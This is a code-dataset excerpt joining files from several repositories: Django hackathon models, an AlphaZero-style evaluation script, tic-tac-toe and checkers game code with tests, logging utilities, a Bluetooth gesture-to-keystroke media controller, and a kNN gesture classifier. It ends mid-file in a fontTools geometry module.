(NOT_READY, 'Team NOT ready'),
(READY, 'Team ready!'),
(EXCLUDED, 'excluded'),
)
class Team(models.Model):
"""
    Hackathon team
"""
members = models.ManyToManyField(Hacker)
name = models.CharField(max_length=32)
info = models.CharField(max_length=255)
github = models.URLField()
presentation = models.FileField()
image = models.ImageField()
leader = models.ForeignKey(
Hacker,
on_delete=models.DO_NOTHING,
related_name='leader'
)
status = models.SmallIntegerField(
db_index=True,
choices=TeamStatus.CHOICES,
default=TeamStatus.NOT_READY,
verbose_name=_('Статус команды')
)
    # TODO: express this as a percentage
progress = models.PositiveSmallIntegerField()
rating = models.PositiveIntegerField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Organizer(models.Model):
name = models.CharField(max_length=32)
user = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
city = models.ForeignKey(
City,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
info = models.CharField(max_length=32)
description = models.TextField()
image = models.ImageField()
url = models.URLField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Sponsor(models.Model):
name = models.CharField(max_length=32)
manager = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
info = models.CharField(max_length=32)
description = models.TextField()
url = models.URLField()
image = models.ImageField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Hackathon(models.Model):
user = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
sponsor = models.ManyToManyField(Sponsor)
organizer = models.ForeignKey(Organizer, on_delete=models.DO_NOTHING)
name = models.CharField(max_length=32)
url = models.URLField(max_length=150)
startDate = models.DateTimeField()
endDate = models.DateTimeField()
address = models.CharField(max_length=32)
city = models.ForeignKey(
City,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
info = models.CharField(max_length=32)
program = models.TextField()
description = models.TextField()
image = models.ImageField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Nomination(models.Model):
"""
    Prize nominations
"""
name = models.CharField(max_length=32)
sponsor = models.ForeignKey(
Sponsor,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
hackathon = models.ForeignKey(
Hackathon,
on_delete=models.DO_NOTHING,
blank=False,
null=False,
)
teams = models.ManyToManyField(
Team,
blank=True,
)
info = models.CharField(max_length=32, blank=True)
description = models.TextField(blank=True)
image = models.ImageField(blank=True)
prize = models.PositiveSmallIntegerField(blank=True)
def __str__(self):
return self.name
``` |
{
"source": "13rian/alpha-zero-framework",
"score": 3
} |
#### File: 13rian/alpha-zero-framework/evaluation.py
```python
import logging
import random
import os
import torch
import numpy as np
import matplotlib.pyplot as plt
from globals import CONST, config
import mcts
from mcts import MCTS
import data_storage
from utils import utils
torch_device = config.evaluation_device
class BoardWrapper:
def __init__(self, board, white_network_number):
self.board = board
self.white_network_number = white_network_number # number of the white player network
<EMAIL>
def main_evaluation(game_class, result_folder):
# configuration values
game_count = 200 # the number of test games to play
mcts_sim_count = 200 # the number of mcts simulations to perform
temp = 0.3 # the temperature used to get the policy for the move selection, gives some randomness
# the logger
utils.init_logger(logging.DEBUG, file_name="log/app.log")
logger = logging.getLogger('evaluation')
# set the random seed
random.seed(a=None, version=2)
np.random.seed(seed=None)
# load the network
network_dir = config.save_dir + "/networks/"
path_list = os.listdir(network_dir)
path_list.sort(key=utils.natural_keys)
    # let all networks play against the last generation without any mcts
best_net_path = network_dir + path_list[-1]
best_net = data_storage.load_net(best_net_path, torch_device)
generation = []
prediction_score = []
for i in range(len(path_list)):
generation.append(i)
net_path = network_dir + path_list[i]
net = data_storage.load_net(net_path, torch_device)
score = net_vs_net_prediction(net, best_net, game_count, game_class)
prediction_score.append(score)
logger.debug("prediction score: {}, network: {}".format(score, net_path))
    # let all networks play against the last generation with mcts
mcts_score = []
path_list = [] # [path_list[0], path_list[-2]]
for i in range(len(path_list)):
net_path = network_dir + path_list[i]
net = data_storage.load_net(net_path, torch_device)
score = net_vs_net_mcts(net, best_net, mcts_sim_count, temp, game_count, game_class)
mcts_score.append(score)
logger.debug("mcts_score score: {}, network: {}".format(score, net_path))
# save the results
np.save(result_folder +"/net_vs_net_pred.npy", np.array(prediction_score))
np.save(result_folder + "/net_vs_net_mcts.npy", np.array(mcts_score))
np.save(result_folder + "/net_vs_net_gen.npy", np.array(generation))
# set the style of the plot
plt.style.use('seaborn-dark-palette')
# plot the prediction score
fig1 = plt.figure(1)
plt.plot(generation, prediction_score)
axes = plt.gca()
axes.set_ylim([0, 0.55])
axes.grid(True, color=(0.9, 0.9, 0.9))
plt.title("Prediction Score vs Best Network")
plt.xlabel("Generation")
plt.ylabel("Prediction Score")
fig1.show()
# # plot the mcts score
# fig2 = plt.figure(2)
# plt.plot(generation, mcts_score)
# axes = plt.gca()
# axes.set_ylim([0, 0.55])
# axes.grid(True, color=(0.9, 0.9, 0.9))
# plt.title("MCTS Prediction Score vs Best Network")
# plt.xlabel("Generation")
# plt.ylabel("MCTS Score")
# fig2.show()
plt.show()
def net_vs_net_prediction(net1, net2, game_count, game_class):
"""
plays the two passed network against each other, in half of the games net1 is white and in the other half net2
is white. to get the policy only the network prediction is used without any mcts simulations. the move to play
is sampled from the policy distribution. playing deterministically makes no sense as the same games would just be
repeated over and over again
:param net1: network 1
:param net2: network 2
:param game_count: the number of games to play in total, half of the games are played as white and the other half as black
:param game_class: the class of the game
:return: score of net1, the score is in the range of 0-1 where:
0: loss
0.5: draw
1: win
"""
half_count = game_count // 2
board_wrapper_list = []
for i in range(2*half_count):
if i < half_count:
board_wrapper_list.append(BoardWrapper(game_class(), CONST.WHITE)) # net1 is white
else:
board_wrapper_list.append(BoardWrapper(game_class(), CONST.BLACK)) # net2 is white
all_terminated = False
while not all_terminated:
batch_list1 = []
batch_list2 = []
idx_list1 = []
idx_list2 = []
for idx, board_wrapper in enumerate(board_wrapper_list):
# skip finished games
if board_wrapper.board.is_terminal():
continue
# get the white perspective
sample, player = board_wrapper.board.white_perspective()
if player == CONST.WHITE:
if board_wrapper.white_network_number == 1:
batch_list1.append(sample)
idx_list1.append(idx)
else:
batch_list2.append(sample)
idx_list2.append(idx)
else:
if board_wrapper.white_network_number == 1:
batch_list2.append(sample)
idx_list2.append(idx)
else:
batch_list1.append(sample)
idx_list1.append(idx)
# get the policy form the network
if len(batch_list1) > 0:
batch1 = torch.Tensor(batch_list1).to(torch_device)
policy1, _ = net1(batch1)
policy1 = policy1.detach().cpu().numpy()
else:
policy1 = None
if len(batch_list2) > 0:
batch2 = torch.Tensor(batch_list2).to(torch_device)
policy2, _ = net2(batch2)
policy2 = policy2.detach().cpu().numpy()
else:
policy2 = None
if policy1 is not None:
for i_batch in range(policy1.shape[0]):
# set the illegal moves to 0
policy = policy1[i_batch]
idx = idx_list1[i_batch]
illegal_moves = board_wrapper_list[idx].board.illegal_actions()
policy[illegal_moves] = 0
# choose an action according to the probability distribution of all legal actions
policy /= np.sum(policy)
action = np.random.choice(len(policy), p=policy)
# execute the best legal action
board_wrapper_list[idx].board.execute_action(action)
if policy2 is not None:
for i_batch in range(policy2.shape[0]):
# set the illegal moves to 0
policy = policy2[i_batch]
idx = idx_list2[i_batch]
illegal_moves = board_wrapper_list[idx].board.illegal_actions()
policy[illegal_moves] = 0
# choose an action according to the probability distribution of all legal actions
policy /= np.sum(policy)
action = np.random.choice(len(policy), p=policy)
# execute the best legal action
board_wrapper_list[idx].board.execute_action(action)
# check if all boards are terminated
all_terminated = True
for board_wrapper in board_wrapper_list:
if not board_wrapper.board.is_terminal():
all_terminated = False
break
# calculate the score of network 1
score = 0
for board_wrapper in board_wrapper_list:
reward = (board_wrapper.board.reward() + 1) / 2
if board_wrapper.white_network_number == 1:
score += reward # net1 is white
else:
score += (1 - reward) # net1 is black
score = score / (2*half_count)
return score
class MCTSContextWrapper:
def __init__(self, board, player1_color):
self.board = board
self.player1_color = player1_color # color of the player 1 (net1)
self.mcts_ctx1 = MCTS(board) # mcts for player 1
self.mcts_ctx2 = MCTS(board) # mcts for player 2
def mcts_info(self):
"""
returns the information needed for the next mcts simulations
:return: the mcts object
1 or 2 depending on the network to use
"""
if self.player1_color == 1:
if self.board.current_player() == CONST.WHITE:
return self.mcts_ctx1, 1
else:
return self.mcts_ctx2, 2
else:
if self.board.current_player() == CONST.WHITE:
return self.mcts_ctx1, 2
else:
return self.mcts_ctx2, 1
def net_vs_net_mcts(net1, net2, mcts_sim_count, temp, game_count, game_class):
"""
plays the two passed network against each other, in half of the games net1 is white and in the other half net2
is white. to get the policy mcts is used.
:param net1: network 1
:param net2: network 2
:param game_count: the number of games to play in total, half of the games are played as white and the other half as black
:param game_class: the class of the game
:return: score of net1, the score is in the range of 0-1 where:
0: loss
0.5: draw
1: win
"""
half_count = game_count // 2
mcts_ctx_wrapper_list = []
for i in range(2*half_count):
if i < half_count:
mcts_ctx_wrapper_list.append(MCTSContextWrapper(game_class(), 1)) # net1 is white
else:
mcts_ctx_wrapper_list.append(MCTSContextWrapper(game_class(), 2)) # net2 is white
all_terminated = False
while not all_terminated:
# prepare the mcts context lists
mcts_list1 = [] # mcts list where net1 needs to be used
mcts_list2 = [] # mcts list where net2 needs to be used
for idx, mcts_ctx_wrapper in enumerate(mcts_ctx_wrapper_list):
# skip finished games
if mcts_ctx_wrapper.board.is_terminal():
continue
mcts_ctx, net_number = mcts_ctx_wrapper.mcts_info()
if net_number == 1:
mcts_list1.append(mcts_ctx)
else:
mcts_list2.append(mcts_ctx)
# run the mcts simulations
mcts.run_simulations(mcts_list1, mcts_sim_count, net1, 0)
mcts.run_simulations(mcts_list2, mcts_sim_count, net2, 0)
# execute the move of the tree search
for i_mcts_ctx, mcts_ctx in enumerate(mcts_list1):
# skip terminated games
if mcts_ctx.board.is_terminal():
continue
# choose the action according to the probability distribution
policy = mcts_ctx.policy_from_state(mcts_ctx.board.state_id(), temp)
action = np.random.choice(len(policy), p=policy)
# execute the action on the board
mcts_ctx.board.execute_action(action)
for i_mcts_ctx, mcts_ctx in enumerate(mcts_list2):
# skip terminated games
if mcts_ctx.board.is_terminal():
continue
# choose the action according to the probability distribution
policy = mcts_ctx.policy_from_state(mcts_ctx.board.state_id(), temp)
action = np.random.choice(len(policy), p=policy)
# execute the action on the board
mcts_ctx.board.execute_action(action)
# check if all boards are terminated
all_terminated = True
for mcts_ctx_wrapper in mcts_ctx_wrapper_list:
if not mcts_ctx_wrapper.board.is_terminal():
all_terminated = False
break
# calculate the score of network 1
score = 0
for mcts_ctx_wrapper in mcts_ctx_wrapper_list:
reward = (mcts_ctx_wrapper.board.reward() + 1) / 2
if mcts_ctx_wrapper.player1_color == 1:
score += reward # net1 is white
else:
            score += (1 - reward)  # net1 is black
score = score / (2*half_count)
return score
```
#### File: games/tic_tac_toe/tic_tac_toe.py
```python
import numpy as np
from globals import CONST
import game
from games.tic_tac_toe import minimax
class TicTacToeBoard(game.GameBoard):
"""
each player gets a separate board representation
0 1 2
3 4 5
6 7 8
if a stone is set for a player the bit string will have a 1 on the correct position
a move is defined by a number, e.g. 4 (this represents setting a stone on the board position 4)
"""
def __init__(self):
self.white_player = 0
self.black_player = 0
        self.player = CONST.WHITE  # color of the player to move
        self.terminal = False  # is the game finished
self.score = 0 # -1 if black wins, 0 if it is a tie and 1 if white wins
self.legal_moves_list = [] # holds all legal moves of the current board position
# calculate all legal moves and disks to flip
self.__calc_legal_moves__()
###########################################################################################################
# methods that need to be implemented #
###########################################################################################################
def is_terminal(self):
return self.terminal
def current_player(self):
return self.player
# def symmetries(self, policy):
# return None, None
#
#
# @staticmethod
# def symmetry_count():
# return 1
def white_perspective(self):
white_board = self.int_to_board(self.white_player)
black_board = self.int_to_board(self.black_player)
if self.player == CONST.WHITE:
bit_board = np.stack((white_board, black_board), axis=0)
player = CONST.WHITE
else:
bit_board = np.stack((black_board, white_board), axis=0)
player = CONST.BLACK
return bit_board, player
def state_id(self):
state = "{}_{}".format(self.white_player, self.black_player)
return state
def execute_action(self, move):
"""
plays the passed move on the board
:param move: integer that defines the position to set the stone
:return:
"""
# if move not in self.legal_moves:
# print("move not in list")
# set the token
if self.player == CONST.WHITE:
self.white_player = self.white_player + (1 << move)
else:
self.black_player = self.black_player + (1 << move)
# check if the player won
self.check_win()
# swap the active player and calculate the legal moves
self.swap_players()
self.__calc_legal_moves__()
def legal_actions(self):
return self.legal_moves_list
def illegal_actions(self):
"""
returns a list of illegal moves
:return:
"""
# define the mask with all disks
disk_mask = self.white_player ^ self.black_player
illegal_moves = []
for move in range(9):
if (1 << move) & disk_mask > 0:
illegal_moves.append(move)
return illegal_moves
def reward(self):
"""
:return: -1 if black has won
                 0 if the game is drawn or the game is still running
1 if white has won
"""
if not self.terminal:
return 0
else:
return self.score
def training_reward(self):
"""
:return: -1 if black has won
                 0 if the game is drawn or the game is still running
1 if white has won
"""
if not self.terminal:
return 0
else:
return self.score
###########################################################################################################
# helper methods #
###########################################################################################################
def from_board_matrix(self, board):
"""
creates the bit board from the passed board representation
        :param board: game represented as a single board matrix
:return:
"""
white_board = board == CONST.WHITE
white_board = white_board.astype(int)
self.white_player = self.board_to_int(white_board)
black_board = board == CONST.BLACK
black_board = black_board.astype(int)
self.black_player = self.board_to_int(black_board)
# calculate all legal moves and disks to flip
self.__calc_legal_moves__()
        # check the game state
self.swap_players()
self.check_win()
self.swap_players()
def print(self):
"""
prints the current board configuration
:return:
"""
# create the board representation form the bit strings
print(self.get_board_matrix())
def get_board_matrix(self):
"""
        :return: human readable game board representation
"""
white_board = self.int_to_board(self.white_player)
black_board = self.int_to_board(self.black_player)
board = np.add(white_board * 1, black_board * 2)
return board
def int_to_board(self, number):
"""
creates the 3x3 bitmask that is represented by the passed integer
        :param number: integer bitboard of one player
        :return: 3x3 matrix representing the board
"""
number = (number & 7) + ((number & 56) << 5) + ((number & 448) << 10)
byte_arr = np.array([number], dtype=np.uint32).view(np.uint8)
board_mask = np.unpackbits(byte_arr).reshape(-1, 8)[0:3, ::-1][:, 0:3]
return board_mask
def board_to_int(self, mask):
"""
converts the passed board mask (3x3) to an integer
:param mask: binary board representation 3x3
:return: integer representing the passed board
"""
bit_arr = np.reshape(mask, -1).astype(np.uint32)
number = bit_arr.dot(1 << np.arange(bit_arr.size, dtype=np.uint32))
return int(number)
def move_to_board_mask(self, move):
"""
:param move: integer defining a move on the board
:return: the move represented as a mask on the 3x3 board
"""
mask = 1 << move
board_mask = self.int_to_board(mask)
return board_mask
def check_win(self):
"""
        checks if the current player has won the game
:return:
"""
if self.three_in_a_row(self.player):
self.terminal = True
self.score = 1 if self.player == CONST.WHITE else -1
def swap_players(self):
self.player = CONST.WHITE if self.player == CONST.BLACK else CONST.BLACK
def white_score(self):
reward = self.reward()
return (reward + 1) / 2
def black_score(self):
reward = self.reward()
return (-reward + 1) / 2
def __calc_legal_moves__(self):
# define the mask with all legal moves
move_mask = bit_not(self.white_player ^ self.black_player, 9) # this is basically an xnor (only 1 if both are 0)
self.legal_moves_list = []
for move in range(9):
if (1 << move) & move_mask > 0:
self.legal_moves_list.append(move)
        # if there are no legal moves the game is drawn
if len(self.legal_moves_list) == 0:
self.terminal = True
def three_in_a_row(self, player):
"""
checks if the passed player has a row of three
:param player: the player for which 3 in a row is checked
:return:
"""
board = self.white_player if player == CONST.WHITE else self.black_player
# horizontal check
if board & 7 == 7 or board & 56 == 56 or board & 448 == 448:
return True
# vertical check
if board & 73 == 73 or board & 146 == 146 or board & 292 == 292:
return True
# diagonal check /
if board & 84 == 84:
return True
# diagonal check \
if board & 273 == 273:
return True
# nothing found
return False
def minimax_move(self):
"""
        returns the optimal minimax move; if there is more than one optimal move, a random one is
        picked
:return:
"""
# get the white score for all legal moves
score_list = np.empty(len(self.legal_moves_list))
for idx, move in enumerate(self.legal_moves_list):
board_clone = self.clone()
board_clone.execute_action(move)
state = board_clone.state_id()
white_score = minimax.state_dict.get(state)
score_list[idx] = white_score
# find the indices of the max score for white and the min score for black
if self.player == CONST.WHITE:
move_indices = np.argwhere(score_list == np.amax(score_list))
else:
move_indices = np.argwhere(score_list == np.amin(score_list))
move_indices = move_indices.squeeze(axis=1)
best_moves = np.array(self.legal_moves_list)[move_indices]
best_move = np.random.choice(best_moves, 1)
return int(best_move)
def bit_not(n, bit_length):
"""
defines the logical not operation
:param n: the number to which the not operation is applied
:param bit_length: the length of the bit to apply the not operation
:return:
"""
return (1 << bit_length) - 1 - n
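# Minimal self-check (added sketch, not part of the original module):
if __name__ == "__main__":
    assert bit_not(0b000011010, 9) == 0b111100101
    print("bit_not ok")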
```
#### File: test/games/checkersTest.py
```python
import unittest
from games.checkers import checkers
from globals import CONST
class TestCheckers(unittest.TestCase):
def setUp(self):
self.test_game = TestGame()
def test_game(self):
self.test_game.white_has_one_legal_capture()
self.assertEqual(self.test_game.current_player(), CONST.WHITE)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.black_has_two_captures()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.black_has_a_king()
self.assertTrue("B" in self.test_game.board.to_string())
self.test_game.black_can_make_king_move()
self.test_game.black_king_can_be_captured()
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.black_king_captured()
self.assertTrue("B" not in self.test_game.board.to_string())
self.test_game.white_one_branch_capture()
self.assertEqual(self.test_game.current_player(), CONST.WHITE)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.white_needs_to_decide_at_branch()
self.assertEqual(self.test_game.current_player(), CONST.WHITE)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.white_has_king()
self.assertTrue("W" in self.test_game.board.to_string())
self.test_game.black_can_capture_whites_king()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.no_white_king_anymore()
self.assertTrue("W" not in self.test_game.board.to_string())
self.test_game.black_one_double_capture_and_branch_capture()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.black_needs_to_decide_at_branch()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.black_two_captures_and_king_capture()
self.assertEqual(len(self.test_game.legal_pdn_moves()), 3)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[2])
class TestGame:
def __init__(self):
self.board = checkers.CheckersBoard()
def legal_pdn_moves(self):
legal_actions = self.board.legal_actions()
return [checkers.action_to_pdn(legal_action, self.board.player) for legal_action in legal_actions]
def current_player(self):
return self.board.current_player()
def white_has_one_legal_capture(self):
self.board.play_pdn_move("11-15")
self.board.play_pdn_move("24-19")
def black_has_two_captures(self):
self.board.play_pdn_move("15x24")
def black_has_a_king(self):
self.board.play_pdn_move("28x19")
self.board.play_pdn_move("8-11")
self.board.play_pdn_move("27-24")
self.board.play_pdn_move("3-8")
self.board.play_pdn_move("32-27")
self.board.play_pdn_move("11-15")
self.board.play_pdn_move("21-17")
self.board.play_pdn_move("10-14")
self.board.play_pdn_move("17x10")
def black_can_make_king_move(self):
self.board.play_pdn_move("6-10")
def black_king_can_be_captured(self):
self.board.play_pdn_move("3-7")
def black_king_captured(self):
self.board.play_pdn_move("2x11")
def white_one_branch_capture(self):
self.board.play_pdn_move("25-21")
self.board.play_pdn_move("1-6")
self.board.play_pdn_move("30-25")
self.board.play_pdn_move("11-16")
self.board.play_pdn_move("23-18")
def white_needs_to_decide_at_branch(self):
self.board.play_pdn_move("16x23")
def white_has_king(self):
self.board.play_pdn_move("23x32")
def black_can_capture_whites_king(self):
self.board.play_pdn_move("18x11")
self.board.play_pdn_move("8x15")
self.board.play_pdn_move("24-20")
self.board.play_pdn_move("32-27")
def no_white_king_anymore(self):
self.board.play_pdn_move("31x24")
def black_one_double_capture_and_branch_capture(self):
self.board.play_pdn_move("4-8")
self.board.play_pdn_move("21-17")
self.board.play_pdn_move("8-11")
self.board.play_pdn_move("25-21")
self.board.play_pdn_move("9-13")
self.board.play_pdn_move("29-25")
self.board.play_pdn_move("6-9")
self.board.play_pdn_move("26-23")
self.board.play_pdn_move("15-19")
def black_needs_to_decide_at_branch(self):
self.board.play_pdn_move("24x15")
def black_two_captures_and_king_capture(self):
self.board.play_pdn_move("15x8")
self.board.play_pdn_move("9-14")
self.board.play_pdn_move("8-3")
self.board.play_pdn_move("5-9")
self.board.play_pdn_move("3-7")
self.board.play_pdn_move("14-18")
if __name__ == '__main__':
unittest.main()
```
#### File: alpha-zero-framework/utils/utils.py
```python
import logging
import os
import sys
import cProfile
import io
import pstats
import re
def init_logger(level, **kwargs):
"""
initializes the logger
:param level: level of the logger, e.g. logging.DEBUG
:param kwargs: file_name: name of the file to which should be logged
:return:
"""
# initialize the logger
logger = logging.getLogger() # configure the root logger
logger.setLevel(level)
# create the file handler
if 'file_name' in kwargs:
# create the log file path if needed
file_name = kwargs.get('file_name')
os.makedirs(os.path.dirname(file_name), exist_ok=True)
# create the handler
file_handler = logging.FileHandler(file_name)
file_handler.setLevel(level)
# add the formatter
formatter_file = logging.Formatter(
'%(asctime)s.%(msecs)03d - %(name)-15s(%(lineno)-4d) - [%(levelname)-7s] - %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
file_handler.setFormatter(formatter_file)
logger.addHandler(file_handler)
# create the console logger
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging.DEBUG)
formatter_console = logging.Formatter(
'%(asctime)s.%(msecs)03d - %(name)-15s(%(lineno)-4d) - [%(levelname)-7s] - %(message)s', datefmt="%H:%M:%S")
console_handler.setFormatter(formatter_console)
logger.addHandler(console_handler)
logger.debug('logger successfully initialized')
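# Usage sketch (the file path below is made up for illustration):
#
#   init_logger(logging.DEBUG, file_name="logs/training.log")
#   logging.getLogger(__name__).info("hello")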
def profile(fnc):
"""
decorator that can be used to profile function, the output is written to the file profile.txt
:param fnc: function for the decorator
:return:
"""
def inner(*args, **kwargs):
pr = cProfile.Profile()
pr.enable()
retval = fnc(*args, **kwargs)
pr.disable()
s = io.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
# write the output to a file
file = open("profile.txt", "w")
file.write(s.getvalue())
file.close()
return retval
return inner
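# Usage sketch (slow_function is a hypothetical example):
#
#   @profile
#   def slow_function():
#       return sum(i * i for i in range(10_000))
#
#   slow_function()  # cumulative timings are written to profile.txt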
def bit_not(n, bit_length):
"""
defines the logical not operation
:param n: the number to which the not operation is applied
:param bit_length: the length of the bit to apply the not operation
:return:
"""
return (1 << bit_length) - 1 - n
def atoi(text):
return int(text) if text.isdigit() else text
def popcount(num):
"""
counts the number of bits that are set in the passed integer
:param num: integer
:return:
"""
return bin(num).count('1')
def natural_keys(text):
"""
    sort key for natural (human) sort: numeric parts are compared as numbers, so
    "something1", "something2", "something12", "something17", "something25" come out in that order
    use it like this: list.sort(key=natural_keys)
:param text:
:return:
"""
return [atoi(c) for c in re.split(r'(\d+)', text)]
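# Small runnable sketch (added for illustration): exercises the sorting and
# bit-count helpers above.
if __name__ == "__main__":
    names = ["net_12", "net_2", "net_1"]
    names.sort(key=natural_keys)
    assert names == ["net_1", "net_2", "net_12"]
    assert popcount(0b1011) == 3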
``` |
{
"source": "13rianK/Senior-Thesis",
"score": 3
} |
#### File: 13rianK/Senior-Thesis/bluetooth.py
```python
import Adafruit_BluefruitLE, ctypes, os
from Adafruit_BluefruitLE.services import UART
cmd = """
osascript -e 'tell application "System Events" to keystroke "m"
using {command down}'
"""
right = """
osascript -e 'tell application "System Events" to key code 124'
"""
left = """
osascript -e 'tell application "System Events" to key code 123'
"""
Full = """
osascript -e 'tell application "System Events" to keystroke "f"
using {shift down} '
"""
pause = """
osascript -e 'tell application "System Events" to keystroke space'
"""
vdown = """
osascript -e 'tell application "System Events" to keystroke ">" '
"""
vup = """
osascript -e 'tell application "System Events" to key code 126'
"""
# Get the BLE provider for the current platform.
ble = Adafruit_BluefruitLE.get_provider()
# Main Function
def main():
ble.clear_cached_data() # Clear Cached Data
# Get the first available BLE network adapter
adapter = ble.get_default_adapter()
adapter.power_on()
print('Using adapter: {0}'.format(adapter.name))
# Disconnect any currently connected UART devices.
print('Disconnecting any connected UART devices...')
UART.disconnect_devices()
# Scan for UART devices.
print('Searching for UART device...')
try:
adapter.start_scan()
# Search for the first UART device found
device = UART.find_device()
if device is None:
raise RuntimeError('Failed to find UART device!')
finally:
# Make sure scanning is stopped before exiting
adapter.stop_scan()
print('Connecting to device...')
device.connect() # Will time out after 60 seconds
try:
print('Discovering services...')
UART.discover(device)
uart = UART(device)
while(1):
received = uart.read(timeout_sec=5)
            print(received)
if received is not None :
if received == '20' :
os.system(right)
print('right')
elif received == '21' :
os.system(left)
print('left')
elif received == '30' :
os.system(Full)
print('Full')
elif received == '31' :
os.system(pause)
print('pause')
elif received == '10' :
os.system(vdown)
print('vdown')
elif received == '11' :
os.system(vup)
print('vup')
else:
print('Received no data!')
finally:
        # Disconnect device on exit
device.disconnect()
###########################################################
# Initialize the BLE system and start main loop
ble.initialize()
ble.run_mainloop_with(main)
```
#### File: 13rianK/Senior-Thesis/kNN_Motion.py
```python
import csv
import math
# data is in the form of a matrix
# data is 8 dimensional along feature axis
# function to load in csv data
def load(file) :
matrix = []
with open(file) as csvfile :
data = csv.reader(csvfile, delimiter=',')
for row in data :
            row = [float(x) for x in row]  # materialise as a list so the slice below also works on Python 3
matrix.append(row[:8])
return matrix
# Function to remove dimensions not necessary
def remove(matrix, start, end) :
new_matrix = []
for vector in matrix :
new_matrix.append(vector[start:end])
return new_matrix
# load training data into gesture classes
def getGestureClasses() :
training = {}
imu = {}
training[0] = load('movinggesture1.csv')
training[1] = load('movinggesture2.csv')
training[2] = load('movinggesture1_1.csv')
training[3] = load('movinggesture2_1.csv')
training[4] = load('movinggesture1_2.csv')
training[5] = load('movinggesture2_2.csv')
imu[0] = remove(load('movinggesture1.csv'),5,8)
imu[1] = remove(load('movinggesture2.csv'),5,8)
imu[2] = remove(load('movinggesture1_1.csv'),5,8)
imu[3] = remove(load('movinggesture2_1.csv'),5,8)
imu[4] = remove(load('movinggesture1_2.csv'),5,8)
imu[5] = remove(load('movinggesture2_2.csv'),5,8)
return training, imu
# 1 = swipe right = gesture1
# 2 = raise hand = gesture2
# calculate the squared distance between 2 N-dimensional vectors
# IMPORTANT: All data values are in angles (degrees)
def distance(x, y) :
if len(x) != len(y) :
return "Invalid Vectors"
totaldist = 0
for i in range(len(x)) :
totaldist += math.pow((float(x[i]) - float(y[i])),2)
return totaldist
def dictionary(length):
x = {}
for i in range(length) :
x[i] = 0
return x
# Function to find K nearest neighbors for a
# time series of RPY values
def getKNeighbors (k, test, gestclasses):
distances = []
gest_idx = 0
for gesture in gestclasses.values() :
totaldist = 0
for i in range(len(test)) :
            totaldist += distance(gesture[i], test[i].tolist())  # accumulate squared distances between corresponding frames
distances.append((math.sqrt(totaldist)/2.0,gest_idx))
gest_idx += 1
distances.sort()
neighbors = dictionary(len(gestclasses)) # dict of gestures and counts
for dist, gest in distances[:k] :
neighbors[gest] += 1
result = max(neighbors, key=neighbors.get)
return result, distances
# get gesture for a single test point
def getGesture(k,test,TrainingData):
return getKNeighbors(k, test, TrainingData)
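# Runnable sketch (the gesture data below is synthetic; in real use the classes
# come from getGestureClasses(), which reads the CSV files listed there):
if __name__ == "__main__":
    import numpy as np
    classes = {0: [[0.0] * 8] * 5, 1: [[10.0] * 8] * 5}
    window = [np.ones(8) for _ in range(5)]
    label, dists = getGesture(1, window, classes)
    print("predicted gesture:", label)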
``` |
{
"source": "13rianlucero/CrabAgePrediction",
"score": 3
} |
#### File: fontTools/colorLib/geometry.py
```python
from math import copysign, cos, hypot, isclose, pi
from fontTools.misc.roundTools import otRound
def _vector_between(origin, target):
return (target[0] - origin[0], target[1] - origin[1])
def _round_point(pt):
return (otRound(pt[0]), otRound(pt[1]))
def _unit_vector(vec):
length = hypot(*vec)
if length == 0:
return None
return (vec[0] / length, vec[1] / length)
_CIRCLE_INSIDE_TOLERANCE = 1e-4
# The unit vector's X and Y components are respectively
# U = (cos(α), sin(α))
# where α is the angle between the unit vector and the positive x axis.
_UNIT_VECTOR_THRESHOLD = cos(3 / 8 * pi) # == sin(1/8 * pi) == 0.38268343236508984
def _rounding_offset(direction):
# Return 2-tuple of -/+ 1.0 or 0.0 approximately based on the direction vector.
# We divide the unit circle in 8 equal slices oriented towards the cardinal
# (N, E, S, W) and intermediate (NE, SE, SW, NW) directions. To each slice we
# map one of the possible cases: -1, 0, +1 for either X and Y coordinate.
# E.g. Return (+1.0, -1.0) if unit vector is oriented towards SE, or
